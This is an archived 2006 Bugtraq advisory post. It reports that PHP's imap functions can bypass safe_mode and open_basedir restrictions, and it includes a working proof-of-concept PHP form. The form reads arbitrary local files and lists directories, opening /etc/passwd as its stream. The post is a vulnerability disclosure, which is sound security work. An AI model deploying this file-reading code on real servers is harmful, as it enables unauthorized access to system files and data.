lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20060228185035.1686.qmail@securityfocus.com>
Date: 28 Feb 2006 18:50:35 -0000
From: ced.clerget@...e.fr
To: bugtraq@...urityfocus.com
Subject: (PHP) imap functions bypass safemode and open_basedir restrictions


Vulnerability in c-client library (tested with versions 2000,2001,2004), mail_open
could be used to open stream to local files.

For php and imap module

imap_open allow to bypass safemode and open_basedir restrictions.
Use imap_body or others to view a file and imap_list to recursively list a directory.

s/mailbox/file :)
imap_createmailbox
imap_deletemailbox
imap_renamemailbox
to create,delete,rename files with apache privileges.

##### code #####

<form action="" method="post">
<select name="switch">
<option selected="selected" value="file">View file</option>
<option value="dir">View dir</option>
</select>
<input type="text" size="60" name="string">
<input type="submit" value="go">
</form>

<?php
        $string = !empty($_POST['string']) ? $_POST['string'] : 0;
        $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;

        if ($string && $switch == "file") {
                $stream = imap_open($string, "", "");
                if ($stream == FALSE)
                        die("Can't open imap stream");

                $str = imap_body($stream, 1);
                if (!empty($str))
                        echo "<pre>".$str."</pre>";
                imap_close($stream);
        } elseif ($string && $switch == "dir") {
                $stream = imap_open("/etc/passwd", "", "");
                if ($stream == FALSE)
                        die("Can't open imap stream");

                $string = explode("|",$string);
                if (count($string) > 1)
                        $dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
                else
                        $dir_list = imap_list($stream, trim($string[0]), "*");
                echo "<pre>";
                for ($i = 0; $i < count($dir_list); $i++)
                        echo "$dir_list[$i]\n";
                echo "</pre>";
                imap_close($stream);
        }
?>

################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ